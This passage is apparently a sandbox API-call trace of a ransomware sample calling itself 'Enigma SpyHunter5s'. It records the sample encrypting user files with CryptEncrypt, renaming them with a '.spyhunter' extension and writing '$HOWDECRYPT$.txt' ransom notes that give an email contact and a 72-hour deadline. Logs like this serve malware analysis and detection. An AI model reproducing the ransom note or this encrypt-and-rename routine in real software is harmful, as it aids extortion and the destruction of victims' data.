"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.spyhunter")) returned 1 [0155.923] GetProcessHeap () returned 0x2c0000 [0155.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.923] GetProcessHeap () returned 0x2c0000 [0155.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.923] GetProcessHeap () returned 0x2c0000 [0155.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c7f8 | out: hHeap=0x2c0000) returned 1 [0155.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebc8 | out: pbBuffer=0x270ebc8) returned 1 [0155.923] GetProcessHeap () returned 0x2c0000 [0155.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebc0*=0x30) returned 1 [0155.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 91 [0155.924] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0155.924] GetProcessHeap () returned 0x2c0000 [0155.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.924] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb84*=0x432, lpOverlapped=0x0) returned 1 [0156.013] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.014] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb84*=0x432, lpOverlapped=0x0) returned 1 [0156.014] GetProcessHeap () returned 0x2c0000 [0156.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.014] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.014] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x270ebc4*, lpNumberOfBytesWritten=0x270eb84*=0x4, lpOverlapped=0x0) returned 1 [0156.014] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb84*=0x30, lpOverlapped=0x0) returned 1 [0156.014] CloseHandle (hObject=0xa0) returned 1 [0156.014] GetProcessHeap () returned 0x2c0000 [0156.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.014] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.spyhunter") returned 101 [0156.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.spyhunter")) returned 1 [0156.015] GetProcessHeap () returned 0x2c0000 [0156.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.015] GetProcessHeap () returned 0x2c0000 [0156.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.015] GetProcessHeap () returned 0x2c0000 [0156.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45928 | out: hHeap=0x2c0000) returned 1 [0156.015] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebc0 | out: pbBuffer=0x270ebc0) returned 1 [0156.015] GetProcessHeap () returned 0x2c0000 [0156.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebb8*=0x30) returned 1 [0156.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0156.016] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0156.016] GetProcessHeap () returned 0x2c0000 [0156.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.016] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb7c*=0x2800, lpOverlapped=0x0) returned 1 [0156.079] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.079] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb7c*=0x2800, lpOverlapped=0x0) returned 1 [0156.079] GetProcessHeap () returned 0x2c0000 [0156.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.080] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.080] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x270ebbc*, lpNumberOfBytesWritten=0x270eb7c*=0x4, lpOverlapped=0x0) returned 1 [0156.081] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb7c*=0x30, lpOverlapped=0x0) returned 1 [0156.081] CloseHandle (hObject=0xa0) returned 1 [0156.081] GetProcessHeap () returned 0x2c0000 [0156.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.081] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.spyhunter") returned 104 [0156.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log.spyhunter")) returned 1 [0156.082] GetProcessHeap () returned 0x2c0000 [0156.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.082] GetProcessHeap () returned 0x2c0000 [0156.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.082] GetProcessHeap () returned 0x2c0000 [0156.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c5e8 | out: hHeap=0x2c0000) returned 1 [0156.082] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebc0 | out: pbBuffer=0x270ebc0) returned 1 [0156.082] GetProcessHeap () returned 0x2c0000 [0156.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.083] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebb8*=0x30) returned 1 [0156.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0156.083] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".txt") returned 0x0 [0156.083] GetProcessHeap () returned 0x2c0000 [0156.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.083] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb7c*=0xb9, lpOverlapped=0x0) returned 1 [0156.084] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.084] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb7c*=0xb9, lpOverlapped=0x0) returned 1 [0156.084] GetProcessHeap () returned 0x2c0000 [0156.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.084] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.084] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x270ebbc*, lpNumberOfBytesWritten=0x270eb7c*=0x4, lpOverlapped=0x0) returned 1 [0156.085] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb7c*=0x30, lpOverlapped=0x0) returned 1 [0156.085] CloseHandle (hObject=0xa0) returned 1 [0156.085] GetProcessHeap () returned 0x2c0000 [0156.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.085] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.spyhunter") returned 99 [0156.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi.spyhunter")) returned 1 [0156.086] GetProcessHeap () returned 0x2c0000 [0156.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.086] GetProcessHeap () returned 0x2c0000 [0156.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.086] GetProcessHeap () returned 0x2c0000 [0156.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45828 | out: hHeap=0x2c0000) returned 1 [0156.086] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebb8 | out: pbBuffer=0x270ebb8) returned 1 [0156.086] GetProcessHeap () returned 0x2c0000 [0156.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.086] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebb0*=0x30) returned 1 [0156.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0156.087] StrStrW (lpFirst="mapisvc.inf", lpSrch=".txt") returned 0x0 [0156.087] GetProcessHeap () returned 0x2c0000 [0156.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.087] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb74*=0x462, lpOverlapped=0x0) returned 1 [0156.088] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.088] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x462, lpNumberOfBytesWritten=0x270eb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb74*=0x462, lpOverlapped=0x0) returned 1 [0156.088] GetProcessHeap () returned 0x2c0000 [0156.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.088] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.089] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb74, lpOverlapped=0x0 | out: lpBuffer=0x270ebb4*, lpNumberOfBytesWritten=0x270eb74*=0x4, lpOverlapped=0x0) returned 1 [0156.089] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb74, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb74*=0x30, lpOverlapped=0x0) returned 1 [0156.089] CloseHandle (hObject=0xa0) returned 1 [0156.089] GetProcessHeap () returned 0x2c0000 [0156.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.089] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.spyhunter") returned 87 [0156.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf.spyhunter")) returned 1 [0156.090] GetProcessHeap () returned 0x2c0000 [0156.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.090] GetProcessHeap () returned 0x2c0000 [0156.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.090] GetProcessHeap () returned 0x2c0000 [0156.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eefb70 | out: hHeap=0x2c0000) returned 1 [0156.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.091] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.091] WriteFile (in: hFile=0xa0, lpBuffer=0x270eaeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x270eaeb*, lpNumberOfBytesWritten=0x270ec14*=0x127, lpOverlapped=0x0) returned 1 [0156.092] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.092] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec14*=0x2ac, lpOverlapped=0x0) returned 1 [0156.092] CloseHandle (hObject=0xa0) returned 1 [0156.092] GetProcessHeap () returned 0x2c0000 [0156.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8dbe8 | out: hHeap=0x2c0000) returned 1 [0156.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.180] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.180] WriteFile (in: hFile=0x9c, lpBuffer=0x270eae7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec10, lpOverlapped=0x0 | out: lpBuffer=0x270eae7*, lpNumberOfBytesWritten=0x270ec10*=0x127, lpOverlapped=0x0) returned 1 [0156.181] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.181] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec10*=0x2ac, lpOverlapped=0x0) returned 1 [0156.181] CloseHandle (hObject=0x9c) returned 1 [0156.182] GetProcessHeap () returned 0x2c0000 [0156.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c2d0 | out: hHeap=0x2c0000) returned 1 [0156.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebb0 | out: pbBuffer=0x270ebb0) returned 1 [0156.182] GetProcessHeap () returned 0x2c0000 [0156.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270eba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270eba8*=0x30) returned 1 [0156.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0156.206] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".txt") returned 0x0 [0156.206] GetProcessHeap () returned 0x2c0000 [0156.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.206] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270eb6c*=0x2800, lpOverlapped=0x0) returned 1 [0156.229] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.229] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270eb6c*=0x2800, lpOverlapped=0x0) returned 1 [0156.229] GetProcessHeap () returned 0x2c0000 [0156.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.229] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.229] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x270ebac*, lpNumberOfBytesWritten=0x270eb6c*=0x4, lpOverlapped=0x0) returned 1 [0156.229] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, 